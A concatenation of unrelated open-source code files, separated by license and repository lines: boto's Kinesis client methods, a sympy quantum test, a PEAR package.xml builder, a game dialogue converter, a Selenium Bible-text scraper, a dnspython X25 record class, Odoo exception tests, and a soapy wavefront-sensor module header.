stores, and transports the data; a partition key; and the data
blob itself. The data blob could be a segment from a log file,
geographic/location data, website clickstream data, or any
other data type.
The partition key is used to distribute data across shards.
Amazon Kinesis segregates the data records that belong to a
data stream into multiple shards, using the partition key
associated with each data record to determine which shard a
given data record belongs to.
Partition keys are Unicode strings, with a maximum length
limit of 256 bytes. An MD5 hash function is used to map
partition keys to 128-bit integer values and to map associated
data records to shards using the hash key ranges of the
shards. You can override hashing the partition key to
determine the shard by explicitly specifying a hash value
using the `ExplicitHashKey` parameter. For more information,
see the `Amazon Kinesis Developer Guide`_.
`PutRecord` returns the shard ID of where the data record was
placed and the sequence number that was assigned to the data
record.
Sequence numbers generally increase over time. To guarantee
strictly increasing ordering, use the
`SequenceNumberForOrdering` parameter. For more information,
see the `Amazon Kinesis Developer Guide`_.
If a `PutRecord` request cannot be processed because of
insufficient provisioned throughput on the shard involved in
the request, `PutRecord` throws
`ProvisionedThroughputExceededException`.
Data records are accessible for only 24 hours from the time
that they are added to an Amazon Kinesis stream.
:type stream_name: string
:param stream_name: The name of the stream to put the data record into.
:type data: blob
:param data: The data blob to put into the record, which is
Base64-encoded when the blob is serialized.
The maximum size of the data blob (the payload after
Base64-decoding) is 50 kilobytes (KB).
Set `b64_encode` to disable automatic Base64 encoding.
:type partition_key: string
:param partition_key: Determines which shard in the stream the data
record is assigned to. Partition keys are Unicode strings with a
maximum length limit of 256 bytes. Amazon Kinesis uses the
partition key as input to a hash function that maps the partition
key and associated data to a specific shard. Specifically, an MD5
hash function is used to map partition keys to 128-bit integer
values and to map associated data records to shards. As a result of
this hashing mechanism, all data records with the same partition
key will map to the same shard within the stream.
:type explicit_hash_key: string
:param explicit_hash_key: The hash value used to explicitly determine
the shard the data record is assigned to by overriding the
partition key hash.
:type sequence_number_for_ordering: string
:param sequence_number_for_ordering: Guarantees strictly increasing
sequence numbers, for puts from the same client and to the same
partition key. Usage: set the `SequenceNumberForOrdering` of record
n to the sequence number of record n-1 (as returned in the
PutRecordResult when putting record n-1 ). If this parameter is not
set, records will be coarsely ordered based on arrival time.
:type b64_encode: boolean
:param b64_encode: Whether to Base64 encode `data`. Can be set to
``False`` if `data` is already encoded to prevent double encoding.
"""
params = {
'StreamName': stream_name,
'Data': data,
'PartitionKey': partition_key,
}
if explicit_hash_key is not None:
params['ExplicitHashKey'] = explicit_hash_key
if sequence_number_for_ordering is not None:
params['SequenceNumberForOrdering'] = sequence_number_for_ordering
if b64_encode:
params['Data'] = base64.b64encode(params['Data'])
return self.make_request(action='PutRecord',
body=json.dumps(params))
def split_shard(self, stream_name, shard_to_split, new_starting_hash_key):
"""
This operation splits a shard into two new shards in the
stream, to increase the stream's capacity to ingest and
transport data. `SplitShard` is called when there is a need to
increase the overall capacity of stream because of an expected
increase in the volume of data records being ingested.
`SplitShard` can also be used when a given shard appears to be
approaching its maximum utilization, for example, when the set
of producers sending data into the specific shard are suddenly
sending more than previously anticipated. You can also call
the `SplitShard` operation to increase stream capacity, so
that more Amazon Kinesis applications can simultaneously read
data from the stream for real-time processing.
The `SplitShard` operation requires that you specify the shard
to be split and the new hash key, which is the position in the
shard where the shard gets split in two. In many cases, the
new hash key might simply be the average of the beginning and
ending hash key, but it can be any hash key value in the range
being mapped into the shard. For more information about
splitting shards, see the `Amazon Kinesis Developer Guide`_.
You can use the DescribeStream operation to determine the
shard ID and hash key values for the `ShardToSplit` and
`NewStartingHashKey` parameters that are specified in the
`SplitShard` request.
`SplitShard` is an asynchronous operation. Upon receiving a
`SplitShard` request, Amazon Kinesis immediately returns a
response and sets the stream status to UPDATING. After the
operation is completed, Amazon Kinesis sets the stream status
to ACTIVE. Read and write operations continue to work while
the stream is in the UPDATING state.
You can use `DescribeStream` to check the status of the
stream, which is returned in `StreamStatus`. If the stream is
in the ACTIVE state, you can call `SplitShard`. If a stream is
in CREATING or UPDATING or DELETING states, then Amazon
Kinesis returns a `ResourceInUseException`.
If the specified stream does not exist, Amazon Kinesis returns
a `ResourceNotFoundException`. If you try to create more
shards than are authorized for your account, you receive a
`LimitExceededException`.
**Note:** The default limit for an AWS account is two shards
per stream. If you need to create a stream with more than two
shards, contact AWS Support to increase the limit on your
account.
If you try to operate on too many streams in parallel using
CreateStream, DeleteStream, MergeShards or SplitShard, you
will receive a `LimitExceededException`.
`SplitShard` has a limit of 5 transactions per second per
account.
:type stream_name: string
:param stream_name: The name of the stream for the shard split.
:type shard_to_split: string
:param shard_to_split: The shard ID of the shard to split.
:type new_starting_hash_key: string
:param new_starting_hash_key: A hash key value for the starting hash
key of one of the child shards created by the split. The hash key
range for a given shard constitutes a set of ordered contiguous
positive integers. The value for `NewStartingHashKey` must be in
the range of hash keys being mapped into the shard. The
`NewStartingHashKey` hash key value and all higher hash key values
in hash key range are distributed to one of the child shards. All
the lower hash key values in the range are distributed to the other
child shard.
"""
params = {
'StreamName': stream_name,
'ShardToSplit': shard_to_split,
'NewStartingHashKey': new_starting_hash_key,
}
return self.make_request(action='SplitShard',
body=json.dumps(params))
def make_request(self, action, body):
headers = {
'X-Amz-Target': '%s.%s' % (self.TargetPrefix, action),
'Host': self.region.endpoint,
'Content-Type': 'application/x-amz-json-1.1',
'Content-Length': str(len(body)),
}
http_request = self.build_base_http_request(
method='POST', path='/', auth_path='/', params={},
headers=headers, data=body)
response = self._mexe(http_request, sender=None,
override_num_retries=10)
response_body = response.read()
boto.log.debug(response.getheaders())
boto.log.debug(response_body)
if response.status == 200:
if response_body:
return json.loads(response_body)
else:
json_body = json.loads(response_body)
fault_name = json_body.get('__type', None)
exception_class = self._faults.get(fault_name, self.ResponseError)
raise exception_class(response.status, response.reason,
body=json_body)
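# Hedged usage sketch (not part of boto itself): a minimal put/read round trip
# against an already ACTIVE stream. The stream name is illustrative and AWS
# credentials are assumed to come from the usual boto configuration sources.
if __name__ == '__main__':
    conn = KinesisConnection()
    conn.put_record('example-stream', 'hello kinesis', partition_key='demo')
    description = conn.describe_stream('example-stream')['StreamDescription']
    shard_id = description['Shards'][0]['ShardId']
    iterator = conn.get_shard_iterator('example-stream', shard_id,
                                       'TRIM_HORIZON')['ShardIterator']
    for record in conn.get_records(iterator, limit=10)['Records']:
        print(record['Data'])  # already Base64-decoded by get_records()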
|
bsd-3-clause
|
Vishluck/sympy
|
sympy/physics/quantum/tests/test_represent.py
|
124
|
5124
|
from sympy import Float, I, Integer, Matrix
from sympy.external import import_module
from sympy.utilities.pytest import skip
from sympy.physics.quantum.dagger import Dagger
from sympy.physics.quantum.represent import (represent, rep_innerproduct,
rep_expectation, enumerate_states)
from sympy.physics.quantum.state import Bra, Ket
from sympy.physics.quantum.operator import Operator, OuterProduct
from sympy.physics.quantum.tensorproduct import TensorProduct
from sympy.physics.quantum.tensorproduct import matrix_tensor_product
from sympy.physics.quantum.commutator import Commutator
from sympy.physics.quantum.anticommutator import AntiCommutator
from sympy.physics.quantum.innerproduct import InnerProduct
from sympy.physics.quantum.matrixutils import (numpy_ndarray,
scipy_sparse_matrix, to_numpy,
to_scipy_sparse, to_sympy)
from sympy.physics.quantum.cartesian import XKet, XOp, XBra
from sympy.physics.quantum.qapply import qapply
from sympy.physics.quantum.operatorset import operators_to_state
Amat = Matrix([[1, I], [-I, 1]])
Bmat = Matrix([[1, 2], [3, 4]])
Avec = Matrix([[1], [I]])
class AKet(Ket):
@classmethod
def dual_class(self):
return ABra
def _represent_default_basis(self, **options):
return self._represent_AOp(None, **options)
def _represent_AOp(self, basis, **options):
return Avec
class ABra(Bra):
@classmethod
def dual_class(self):
return AKet
class AOp(Operator):
def _represent_default_basis(self, **options):
return self._represent_AOp(None, **options)
def _represent_AOp(self, basis, **options):
return Amat
class BOp(Operator):
def _represent_default_basis(self, **options):
return self._represent_AOp(None, **options)
def _represent_AOp(self, basis, **options):
return Bmat
k = AKet('a')
b = ABra('a')
A = AOp('A')
B = BOp('B')
_tests = [
# Bra
(b, Dagger(Avec)),
(Dagger(b), Avec),
# Ket
(k, Avec),
(Dagger(k), Dagger(Avec)),
# Operator
(A, Amat),
(Dagger(A), Dagger(Amat)),
# OuterProduct
(OuterProduct(k, b), Avec*Avec.H),
# TensorProduct
(TensorProduct(A, B), matrix_tensor_product(Amat, Bmat)),
# Pow
(A**2, Amat**2),
# Add/Mul
(A*B + 2*A, Amat*Bmat + 2*Amat),
# Commutator
(Commutator(A, B), Amat*Bmat - Bmat*Amat),
# AntiCommutator
(AntiCommutator(A, B), Amat*Bmat + Bmat*Amat),
# InnerProduct
(InnerProduct(b, k), (Avec.H*Avec)[0])
]
def test_format_sympy():
for test in _tests:
lhs = represent(test[0], basis=A, format='sympy')
rhs = to_sympy(test[1])
assert lhs == rhs
def test_scalar_sympy():
assert represent(Integer(1)) == Integer(1)
assert represent(Float(1.0)) == Float(1.0)
assert represent(1.0 + I) == 1.0 + I
np = import_module('numpy')
def test_format_numpy():
if not np:
skip("numpy not installed.")
for test in _tests:
lhs = represent(test[0], basis=A, format='numpy')
rhs = to_numpy(test[1])
if isinstance(lhs, numpy_ndarray):
assert (lhs == rhs).all()
else:
assert lhs == rhs
def test_scalar_numpy():
if not np:
skip("numpy not installed.")
assert represent(Integer(1), format='numpy') == 1
assert represent(Float(1.0), format='numpy') == 1.0
assert represent(1.0 + I, format='numpy') == 1.0 + 1.0j
scipy = import_module('scipy', __import__kwargs={'fromlist': ['sparse']})
def test_format_scipy_sparse():
if not np:
skip("numpy not installed.")
if not scipy:
skip("scipy not installed.")
for test in _tests:
lhs = represent(test[0], basis=A, format='scipy.sparse')
rhs = to_scipy_sparse(test[1])
if isinstance(lhs, scipy_sparse_matrix):
assert np.linalg.norm((lhs - rhs).todense()) == 0.0
else:
assert lhs == rhs
def test_scalar_scipy_sparse():
if not np:
skip("numpy not installed.")
if not scipy:
skip("scipy not installed.")
assert represent(Integer(1), format='scipy.sparse') == 1
assert represent(Float(1.0), format='scipy.sparse') == 1.0
assert represent(1.0 + I, format='scipy.sparse') == 1.0 + 1.0j
x_ket = XKet('x')
x_bra = XBra('x')
x_op = XOp('X')
def test_innerprod_represent():
assert rep_innerproduct(x_ket) == InnerProduct(XBra("x_1"), x_ket).doit()
assert rep_innerproduct(x_bra) == InnerProduct(x_bra, XKet("x_1")).doit()
try:
rep_innerproduct(x_op)
except TypeError:
return True
def test_operator_represent():
basis_kets = enumerate_states(operators_to_state(x_op), 1, 2)
assert rep_expectation(
x_op) == qapply(basis_kets[1].dual*x_op*basis_kets[0])
def test_enumerate_states():
test = XKet("foo")
assert enumerate_states(test, 1, 1) == [XKet("foo_1")]
assert enumerate_states(
test, [1, 2, 4]) == [XKet("foo_1"), XKet("foo_2"), XKet("foo_4")]
|
bsd-3-clause
|
tqnghiep/sp
|
simplesaml/vendor/openid/php-openid/admin/packagexml.py
|
56
|
4603
|
#!/usr/bin/python
import os
import os.path
def makeMaintainerXML(leads):
maintainer_template = """
<maintainer>
<user>%(user)s</user>
<name>%(name)s</name>
<email>%(email)s</email>
<role>lead</role>
</maintainer>
"""
return "<maintainers>" + \
"".join([maintainer_template % l for l in leads]) + \
"</maintainers>"
def makeLeadXML(leads):
lead_template = """
<lead>
<name>%(name)s</name>
<user>%(user)s</user>
<email>%(email)s</email>
<active>%(active)s</active>
</lead>
"""
return "".join([lead_template % l for l in leads])
INDENT_STRING = " "
def buildContentsXMLFordir(dir_or_file, roles, depth=0, dir_role=None,
all_files=False):
"""
Returns a list of strings, each of which is either a <file> XML
element for the given file or a <dir> element which contains other
<file> elements.
"""
try:
entries = os.listdir(dir_or_file)
dir_role_s = ''
if dir_role:
dir_role_s = ' role="%s"' % (dir_role)
lines = ['%s<dir name="%s"%s>' % (INDENT_STRING * depth,
os.path.basename(dir_or_file),
dir_role_s)]
for entry in entries:
lines += buildContentsXMLFordir(dir_or_file + os.sep + entry, roles,
depth + 1, dir_role, all_files)
lines.append('%s</dir>' % (INDENT_STRING * depth))
return lines
except OSError:
try:
extension = dir_or_file.split(".")[-1]
except:
if not all_files:
return []
if all_files and dir_role:
return ['%s<file name="%s" role="%s" />' %
(INDENT_STRING * depth, os.path.basename(dir_or_file), dir_role)]
elif extension in roles: # Ends in an extension we care about
return ['%s<file name="%s" role="%s" />' %
(INDENT_STRING * depth, os.path.basename(dir_or_file),
roles[extension])]
else:
return []
def buildContentsXML(roles, *dirs):
lines = []
for directory in dirs:
lines.append("\n".join(buildContentsXMLFordir(directory, roles, 1)))
return "\n".join(lines)
def buildDocsXML(*dirs):
lines = []
for directory in dirs:
lines.append("\n".join(buildContentsXMLFordir(directory, {}, 1, 'doc',
all_files=True)))
return "\n".join(lines)
if __name__ == "__main__":
def usage(progname):
print "Usage: %s <package version> <xml template file> <release notes file>" % (progname)
import sys
import time
try:
import xmlconfig
except:
print "Could not import XML configuration module xmlconfig"
sys.exit(1)
# Expect sys.argv[2] to be the name of the XML file template to
# use for processing.
try:
template_f = open(sys.argv[2], 'r')
except Exception, e:
usage(sys.argv[0])
print "Could not open template file:", str(e)
sys.exit(1)
# Expect sys.argv[1] to be the version number to include in the
# package.xml file.
try:
version = sys.argv[1]
except:
usage(sys.argv[0])
sys.exit(2)
# Expect sys.argv[3] to be the name of the release notes file.
try:
release_file = sys.argv[3]
release_file_h = open(release_file, 'r')
release_notes = release_file_h.read().strip()
release_file_h.close()
except Exception, e:
usage(sys.argv[0])
print str(e)
sys.exit(3)
data = xmlconfig.__dict__.copy()
contentsXml = buildContentsXML({'php': 'php'}, *xmlconfig.contents_dirs)
docsXml = buildDocsXML(*xmlconfig.docs_dirs)
contents = '<dir name="/">\n' + contentsXml + \
"\n" + docsXml + '\n </dir>'
contents_v1 = '<filelist><dir name="/" baseinstalldir="Auth">\n' + contentsXml + \
"\n" + docsXml + '\n </dir></filelist>'
data['contents'] = contents
data['contents_version_1'] = contents_v1
data['leads'] = makeLeadXML(xmlconfig.leads)
data['maintainers'] = makeMaintainerXML(xmlconfig.leads)
data['date'] = time.strftime("%Y-%m-%d")
data['version'] = version
data['uri'] = "%s%s-%s.tgz" % (data['package_base_uri'], data['package_name'],
version)
data['release_notes'] = release_notes
template_data = template_f.read()
print template_data % data
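# Hedged illustration (not part of the original script): makeLeadXML() simply
# substitutes each lead dict into the <lead> template, e.g.
#
#     makeLeadXML([{'name': 'Jane Doe', 'user': 'jdoe',
#                   'email': 'jdoe@example.com', 'active': 'yes'}])
#
# returns a string containing "<lead> ... <name>Jane Doe</name> ... </lead>";
# the maintainer data here is invented purely for illustration.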
|
gpl-2.0
|
parpg/parpg
|
tools/utilities/convert_dialogue.py
|
1
|
3506
|
#!/usr/bin/env python
"""Convert YAML dialogue files from the Techdemo1 format to the new Techdemo2
format.
@author: M. George Hansen <technopolitica@gmail.com>
"""
import os.path
import sys
sys.path.insert(0, os.path.realpath(os.path.join(os.path.dirname(__file__),
os.path.pardir)))
import shutil
import logging
from optparse import OptionParser
from parpg.dialogueparsers import (OldYamlDialogueParser, YamlDialogueParser,
DialogueFormatError)
def backup_file(filepath):
dirpath = os.path.dirname(filepath)
filename = os.path.basename(filepath)
shutil.copy2(filepath, os.path.join(dirpath,
'.'.join([filename, 'backup'])))
def convert_dialogue_file(filepath, backup):
logging.info('processing {0}...'.format(filepath))
dummy, extension = os.path.splitext(filepath)
if (not extension == '.yaml'):
logging.info(' skipping {0}: not a yaml file'.format(filepath))
return 1
with file(filepath, 'r') as dialogue_file:
old_parser = OldYamlDialogueParser()
new_parser = YamlDialogueParser()
try:
dialogue = old_parser.load(dialogue_file)
except DialogueFormatError as error:
logging.info(
' unable to convert {0}: unrecognized dialogue format'
.format(filepath)
)
return 1
if (backup):
backup_file(filepath)
logging.info(' backed up {0} as {0}.backup'.format(filepath))
with file(filepath, 'w') as dialogue_file:
new_parser.dump(dialogue, dialogue_file)
logging.info(' successfully converted {0}!'.format(filepath))
usage_message = '''\
usage: convert_dialogue.py [-h] [-n] [-v] [-q] file_or_dir
Convert YAML dialogue files written in Techdemo1 syntax to the new Techdemo2
syntax.
If the file_or_dir argument is a directory, then this script will attempt to
convert all .yaml files in the directory that contain valid dialogues.
By default all processed files are first backed up by adding a ".backup" suffix
to the filename + extension. Backups can be disabled by passing the -n option
to the script.
'''
def main(argv=sys.argv):
# Options.
backup = True
logging_level = logging.WARNING
parser = OptionParser(usage=usage_message,
description="Convert YAML dialogue files written "
"in Techdemo1 syntax to the new "
"Techdemo2 syntax.")
parser.add_option('-n', '--no-backup', action='store_false', dest='backup', default=True)
parser.add_option('-v', '--verbose', action='count', default=0)
parser.add_option('-q', '--quiet', action='count', default=0)
opts, args = parser.parse_args()
backup = opts.backup
verbosity = opts.verbose * 10
quietness = - (opts.quiet * 10)
logging_level += (verbosity + quietness)
logging.basicConfig(format='%(message)s', level=logging_level)
try:
path = args[0]
except IndexError:
parser.print_help()
sys.exit(1)
if (os.path.isdir(path)):
for filepath in os.listdir(path):
qualified_filepath = os.path.join(path, filepath)
if (not os.path.isfile(qualified_filepath)):
continue
convert_dialogue_file(qualified_filepath, backup=backup)
else:
convert_dialogue_file(path, backup=backup)
if __name__ == '__main__':
main()
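# Editor's note: a hedged usage sketch (not part of the original tool) showing
# how the converter can be driven from Python rather than the command line.
# The file path below is illustrative only; this function is never called here.
def _example_programmatic_conversion():
    """Convert a single dialogue file in place, keeping a .backup copy."""
    logging.basicConfig(format='%(message)s', level=logging.INFO)
    convert_dialogue_file('dialogue/old_npc.yaml', backup=True)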
|
gpl-3.0
|
hoaibang07/Webscrap
|
transcripture/sources/crawler_chuongthieu.py
|
1
|
7017
|
# -*- encoding: utf-8 -*-
import io
from bs4 import BeautifulSoup
from bs4 import SoupStrainer
import urllib2
import urlparse
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import time
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import TimeoutException
import os.path
zenmatePath = "/home/hbc/.mozilla/firefox/yeyuaq0s.default/extensions/firefox@zenmate.com.xpi"
ffprofile = webdriver.FirefoxProfile()
# ffprofile.set_preference("javascript.enabled", False)
# ffprofile.set_preference('permissions.default.image', 2)
# ffprofile.set_preference('permissions.default.stylesheet', 2)
# ffprofile.set_preference('dom.ipc.plugins.enabled.libflashplayer.so', 'false')
ffprofile.add_extension(zenmatePath)
ffprofile.add_extension('/home/hbc/Downloads/quickjava-2.0.6-fx.xpi')
ffprofile.set_preference("thatoneguydotnet.QuickJava.curVersion", "2.0.6.1") ## Prevents loading the 'thank you for installing screen'
ffprofile.set_preference("thatoneguydotnet.QuickJava.startupStatus.Images", 2) ## Turns images off
ffprofile.set_preference("thatoneguydotnet.QuickJava.startupStatus.AnimatedImage", 2) ## Turns animated images off
ffprofile.set_preference("thatoneguydotnet.QuickJava.startupStatus.CSS", 2) ## CSS
# ffprofile.set_preference("thatoneguydotnet.QuickJava.startupStatus.Cookies", 2) ## Cookies
ffprofile.set_preference("thatoneguydotnet.QuickJava.startupStatus.Flash", 2) ## Flash
ffprofile.set_preference("thatoneguydotnet.QuickJava.startupStatus.Java", 2) ## Java
# ffprofile.set_preference("thatoneguydotnet.QuickJava.startupStatus.JavaScript", 2) ## JavaScript
ffprofile.set_preference("thatoneguydotnet.QuickJava.startupStatus.Silverlight", 2) ## Silverlight
driver = webdriver.Firefox(ffprofile)
def _remove_div_vdx(soup):
for div in soup.find_all('div', class_='vidx'):
div.extract()
return soup
def get_data(urlchuong_list, i):
filename = 'urlsach/data/bosung/sach' + str(i) + '.txt'
ftmp = io.open(filename, 'w', encoding='utf-8')
try:
# hdrs = {'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Connection': 'keep-alive',
# 'Cookie': 'ipq_lip=20376774; ipq_set=1453874029; __atuvc=2%7C4; __utma=126044488.676620502.1453787537.1453787537.1453787537.1; __utmz=126044488.1453787537.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=ed3f4874b92a29b6ed036adfa5ad6fb3; ipcountry=us',
# 'Host': 'www.transcripture.com',
# 'Referer': 'http://www.transcripture.com/vietnamese-spanish-genesis-1.html',
# 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:43.0) Gecko/20100101 Firefox/43.0'
# }
count = 1
for urlchuong in urlchuong_list:
            print('Fetching chapter %d, book %d'%(count,i))
# urlchuong = 'http://www.transcripture.com/vietnamese-chinese-revelation-3.html'
# print urlchuong
# # create request
# req = urllib2.Request(urlchuong, headers=hdrs)
# # get response
# response = urllib2.urlopen(req)
# soup = BeautifulSoup(response.read())
# Load a page
driver.get(urlchuong)
# delay = 40 # seconds
# try:
# wait = WebDriverWait(driver, delay)
# path = '/html/body/center/div[1]/div[2]/div[4]/table/tbody/tr[2]/td[1]/div/div[1]/form[1]/select/option[66]'
# elem = driver.find_element_by_xpath(path)
# wait.until(EC.visibility_of(elem))
# print "Page is ready!"
# except TimeoutException:
# print "Loading took too much time!"
# #reload page
# body = driver.find_element_by_tag_name("body")
# body.send_keys(Keys.ESCAPE)
# body.send_keys(Keys.F5)
content = driver.page_source
soup = BeautifulSoup(content)
soup = _remove_div_vdx(soup)
# print soup
table_tag = soup.find_all('table', attrs={'width':'100%', 'cellspacing':'0'})[0]
tr_tags = table_tag.find_all('tr')
_len = len(tr_tags)
# in first tr tag:
h2_class = tr_tags[0].find_all('h2', class_='cphd')
ftmp.write(u'' + h2_class[0].get_text() + '|')
ftmp.write(u'' + h2_class[1].get_text() + '\n')
# print table_tag
for x in xrange(1,_len):
data = tr_tags[x].get_text('|')
# print data
# url_ec = url.encode('unicode','utf-8')
ftmp.write(u'' + data + '\n')
count = count + 1
# close file
ftmp.close()
except Exception, e:
print e
# close file
ftmp.close()
def check_numline(filename):
urlsach_list = []
urlsach_file = open(filename, 'r')
for line in urlsach_file:
urlsach_list.append(line.strip())
_len = len(urlsach_list)
return _len
def getsttchuongthieu(sachi):
list_stt = []
urlsach = 'urlsach/sach' + str(sachi) + '.txt'
    # check the number of lines in the book URL file; it equals the number of chapters
numline = check_numline(urlsach)
fname = 'urlsach/data/partcomplete/sach' + str(sachi) + '.txt'
    # read the data from the book's data file
data = open(fname).read()
    # check whether the book's data file already contains each of these chapter numbers
for i in xrange(1,numline + 1):
key = str(i)
# print ('da chay den day')
if key not in data:
list_stt.append(i)
return list_stt
def getlisturlchuongthieu(sachi):
list_chuongthieu = []
list_stt = getsttchuongthieu(sachi)
fname = 'urlsach/sach' + str(sachi) + '.txt'
fp = open(fname)
lines=fp.readlines()
for stt in list_stt:
list_chuongthieu.append(lines[stt-1])
return list_chuongthieu
def main():
for x in xrange(1,67):
        # check whether the file exists in the partcomplete directory
f2name = 'urlsach/data/partcomplete/sach' + str(x) + '.txt'
if os.path.isfile(f2name):
list_urlchuongthieu = getlisturlchuongthieu(x)
get_data(list_urlchuongthieu, x)
if __name__ == '__main__':
# driver = webdriver.Firefox()
driver.get("about:blank")
# open new tab
# body = driver.find_element_by_tag_name("body")
# body.send_keys(Keys.CONTROL + 't')
# time.sleep(15)
    print('Enter any character to continue the program')
key = raw_input()
main()
# close the tab
driver.find_element_by_tag_name('body').send_keys(Keys.COMMAND + 'w')
driver.close()
# urlchuong_list = ['http://www.transcripture.com/vietnamese-chinese-exodus-1.html']
# get_data(urlchuong_list, 2)
|
gpl-2.0
|
edumatos/namebench
|
nb_third_party/dns/rdtypes/ANY/X25.py
|
248
|
2123
|
# Copyright (C) 2003-2007, 2009, 2010 Nominum, Inc.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose with or without fee is hereby granted,
# provided that the above copyright notice and this permission notice
# appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND NOMINUM DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL NOMINUM BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
import dns.exception
import dns.rdata
import dns.tokenizer
class X25(dns.rdata.Rdata):
"""X25 record
@ivar address: the PSDN address
@type address: string
@see: RFC 1183"""
__slots__ = ['address']
def __init__(self, rdclass, rdtype, address):
super(X25, self).__init__(rdclass, rdtype)
self.address = address
def to_text(self, origin=None, relativize=True, **kw):
return '"%s"' % dns.rdata._escapify(self.address)
def from_text(cls, rdclass, rdtype, tok, origin = None, relativize = True):
address = tok.get_string()
tok.get_eol()
return cls(rdclass, rdtype, address)
from_text = classmethod(from_text)
def to_wire(self, file, compress = None, origin = None):
l = len(self.address)
assert l < 256
byte = chr(l)
file.write(byte)
file.write(self.address)
def from_wire(cls, rdclass, rdtype, wire, current, rdlen, origin = None):
l = ord(wire[current])
current += 1
rdlen -= 1
if l != rdlen:
raise dns.exception.FormError
address = wire[current : current + l]
return cls(rdclass, rdtype, address)
from_wire = classmethod(from_wire)
def _cmp(self, other):
return cmp(self.address, other.address)
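# Editor's note: a hedged, standalone sketch (not part of dnspython) showing
# the X25 wire format implemented above: one length octet followed by the
# PSDN address bytes. The sample address is illustrative only.
def _example_x25_wire_roundtrip(address='311061700956'):
    assert len(address) < 256
    wire = chr(len(address)) + address       # encode, as in X25.to_wire()
    length = ord(wire[0])                    # decode, as in X25.from_wire()
    decoded = wire[1:1 + length]
    assert decoded == address
    return wire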
|
apache-2.0
|
apocalypsebg/odoo
|
openerp/addons/test_exceptions/models.py
|
336
|
3186
|
# -*- coding: utf-8 -*-
import openerp.exceptions
import openerp.osv.orm
import openerp.osv.osv
import openerp.tools.safe_eval
class m(openerp.osv.osv.Model):
""" This model exposes a few methods that will raise the different
exceptions that must be handled by the server (and its RPC layer)
and the clients.
"""
_name = 'test.exceptions.model'
def generate_except_osv(self, cr, uid, ids, context=None):
# title is ignored in the new (6.1) exceptions
raise openerp.osv.osv.except_osv('title', 'description')
def generate_except_orm(self, cr, uid, ids, context=None):
# title is ignored in the new (6.1) exceptions
raise openerp.osv.orm.except_orm('title', 'description')
def generate_warning(self, cr, uid, ids, context=None):
raise openerp.exceptions.Warning('description')
def generate_redirect_warning(self, cr, uid, ids, context=None):
dummy, action_id = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'test_exceptions', 'action_test_exceptions')
raise openerp.exceptions.RedirectWarning('description', action_id, 'go to the redirection')
def generate_access_denied(self, cr, uid, ids, context=None):
raise openerp.exceptions.AccessDenied()
def generate_access_error(self, cr, uid, ids, context=None):
raise openerp.exceptions.AccessError('description')
def generate_exc_access_denied(self, cr, uid, ids, context=None):
raise Exception('AccessDenied')
def generate_undefined(self, cr, uid, ids, context=None):
self.surely_undefined_symbol
def generate_except_osv_safe_eval(self, cr, uid, ids, context=None):
self.generate_safe_eval(cr, uid, ids, self.generate_except_osv, context)
def generate_except_orm_safe_eval(self, cr, uid, ids, context=None):
self.generate_safe_eval(cr, uid, ids, self.generate_except_orm, context)
def generate_warning_safe_eval(self, cr, uid, ids, context=None):
self.generate_safe_eval(cr, uid, ids, self.generate_warning, context)
def generate_redirect_warning_safe_eval(self, cr, uid, ids, context=None):
self.generate_safe_eval(cr, uid, ids, self.generate_redirect_warning, context)
def generate_access_denied_safe_eval(self, cr, uid, ids, context=None):
self.generate_safe_eval(cr, uid, ids, self.generate_access_denied, context)
def generate_access_error_safe_eval(self, cr, uid, ids, context=None):
self.generate_safe_eval(cr, uid, ids, self.generate_access_error, context)
def generate_exc_access_denied_safe_eval(self, cr, uid, ids, context=None):
self.generate_safe_eval(cr, uid, ids, self.generate_exc_access_denied, context)
def generate_undefined_safe_eval(self, cr, uid, ids, context=None):
self.generate_safe_eval(cr, uid, ids, self.generate_undefined, context)
def generate_safe_eval(self, cr, uid, ids, f, context):
globals_dict = { 'generate': lambda *args: f(cr, uid, ids, context) }
openerp.tools.safe_eval.safe_eval("generate()", mode='exec', globals_dict=globals_dict)
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
|
andrewpaulreeves/soapy
|
soapy/wfs/wfs.py
|
2
|
20129
|
#Copyright Durham University and Andrew Reeves
#2014
# This file is part of soapy.
# soapy is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# soapy is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with soapy. If not, see <http://www.gnu.org/licenses/>.
"""
The Soapy WFS module.
This module contains a number of classes which simulate different adaptive optics wavefront sensor (WFS) types. All wavefront sensor classes can inherit from the base ``WFS`` class. The class provides the methods required to calculate the phase over a WFS pointing in a given WFS direction and accounts for Laser Guide Star (LGS) geometry such as cone effect and elongation. If only pupil images (or complex amplitudes) are required, then this class can be used stand-alone.
Example:
Make configuration objects::
from soapy import WFS, confParse
config = confParse.Configurator("config_file.py")
config.loadSimParams()
Initialise the wave-front sensor::
    wfs = WFS.WFS(config, 0, mask)
Set the WFS scrns (these should be made in advance, perhaps by the :py:mod:`soapy.atmosphere` module). Then run the WFS::
wfs.scrns = phaseScrnList
wfs.makePhase()
Now you can view data from the WFS frame::
frameEField = wfs.EField
A Shack-Hartmann WFS is also included in the module; this contains further methods to make the focal plane, then calculate the slopes to send to the reconstructor.
Example:
Using the config objects from above...::
shWfs = WFS.ShackHartmann(config, 0, mask)
